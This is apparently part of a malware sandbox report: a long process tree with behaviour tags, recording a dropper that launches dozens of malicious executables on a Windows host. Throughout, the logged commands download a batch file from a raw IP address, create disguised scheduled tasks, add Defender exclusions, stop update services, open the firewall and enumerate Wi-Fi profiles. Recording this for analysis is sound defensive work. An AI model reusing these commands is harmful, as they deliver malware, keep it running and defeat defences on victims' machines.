                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                                                                                                                                                        9⤵
                                                                                                                                                          PID:4388
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5940 /prefetch:2
                                                                                                                                                          9⤵
                                                                                                                                                            PID:5648
                                                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                                                          attrib +s +h d:\net
                                                                                                                                                          8⤵
                                                                                                                                                          • Sets file to hidden
                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                          PID:3048
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                                                                                                                                                          8⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:2392
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                                                                                                                                                          8⤵
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:988
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\ew.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:440
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\s.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4552
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:1556
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5580
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3112
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6584
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\zts.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\zts.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5612
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 448
                                                                                                                                                  4⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:6128
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6172
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6356
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6440
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 92
                                                                                                                                                    5⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:6296
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6200
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\ktyhpldea.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\ktyhpldea.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:6364
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6468
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\ZinTask.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\ZinTask.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6544
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 244
                                                                                                                                                  4⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:6636
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6756
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "cmd" /c net use
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6952
                                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                                    net use
                                                                                                                                                    5⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:7020
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6896
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3376
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5244
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\test10-29.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\test10-29.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:7136
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\m.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6068
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Papercut.Smtp.Setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Papercut.Smtp.Setup.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5092
                                                                                                                                                • C:\Windows\Temp\{F164CC5E-0CDC-475C-B700-3B73B8D04018}\.cr\Papercut.Smtp.Setup.exe
                                                                                                                                                  "C:\Windows\Temp\{F164CC5E-0CDC-475C-B700-3B73B8D04018}\.cr\Papercut.Smtp.Setup.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\Files\Papercut.Smtp.Setup.exe" -burn.filehandle.attached=556 -burn.filehandle.self=564
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5580
                                                                                                                                                  • C:\Windows\Temp\{52EC1D7F-59E6-4431-AE19-0FC6F1EDDBC0}\.be\Papercut.Smtp.Setup.exe
                                                                                                                                                    "C:\Windows\Temp\{52EC1D7F-59E6-4431-AE19-0FC6F1EDDBC0}\.be\Papercut.Smtp.Setup.exe" -q -burn.elevated BurnPipe.{66EBAF4E-4B36-4B26-929B-F334A9C985C9} {B20DA5C3-95C6-4352-B644-51871DFE308E} 5580
                                                                                                                                                    5⤵
                                                                                                                                                      PID:6792
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:4104
                                                                                                                                                  • C:\Windows\splwow64.exe
                                                                                                                                                    C:\Windows\splwow64.exe 12288
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2524
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\T3.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\T3.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:2484
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\T3.exe' -Force
                                                                                                                                                      4⤵
                                                                                                                                                        PID:6676
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5760
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\random.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5440
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4520
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:5816
                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                          4⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:2116
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1780
                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6008
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:3224
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:6088
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:3684
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:6800
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:6780
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:7072
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:5516
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:6176
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:6380
                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:6120
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\test20.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\test20.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:7148
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\run2.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\run2.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6164
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6649.tmp\664A.tmp\664B.bat C:\Users\Admin\AppData\Local\Temp\Files\run2.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6260
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6068
                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 6260 -s 312
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:6752
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\dsd.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\dsd.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5376
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:1060
                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                            PID:6288
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5524
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8A9A.tmp.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\8A9A.tmp.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3536
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 1344
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              PID:6412
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\js.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\js.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6472
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\msf.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6372
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1228
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Program crash
                                                                                                                                                                                PID:6420
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Indentif.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\Indentif.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6728
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1556
                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                    cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:5304
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:6128
                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4700
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 10 /nobreak
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:3252
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\Final.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\Final.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5704
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1080
                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                                                PID:540
                                                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                                                  chcp 65001
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:5520
                                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                    netsh wlan show profiles
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                                                    PID:7064
                                                                                                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                    findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                    "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:2556
                                                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                                                        chcp 65001
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6200
                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                          netsh wlan show networks mode=bssid
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6452
                                                                                                                                                                                                          • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                            findstr "SSID BSSID Signal"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:912
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:6328
                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1200
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:5072
                                                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4136
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            PID:3532
                                                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4064
                                                                                                                                                                                                            • C:\Windows\System32\dwm.exe
                                                                                                                                                                                                              C:\Windows\System32\dwm.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                              PID:1492
                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4668
                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4564
                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5948
                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                      2⤵
